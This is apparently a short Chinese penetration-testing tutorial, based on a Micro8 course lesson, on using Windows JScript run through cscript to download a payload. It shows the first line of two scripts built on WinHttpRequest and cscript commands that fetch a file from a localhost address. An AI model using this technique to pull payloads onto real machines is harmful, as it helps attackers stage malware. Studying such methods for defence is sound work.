JS一句话下载payload
/0x00 前言
参考Micro8系列第四十三课:https://micro8.gitbook.io/micro8/contents-1/41-50/43js-yi-ju-hua-xia-zai-payload#fu-dai-ma-1
0x01 JS一句话下载payload
Windows全版本支持JS,并且通过cscript来调用达到下载payload的目的。
读取远程文件
readfile.js:
1 | var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); |
一句话读取远程文件payload:
1 | D:\>cscript /nologo readfile.js http://127.0.0.1/test.txt |
写入文件
downfile.js:
1 | var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); |
一句话写入文件payload:
1 | cscript /nologo downfile.js http://127.0.0.1/test.txt |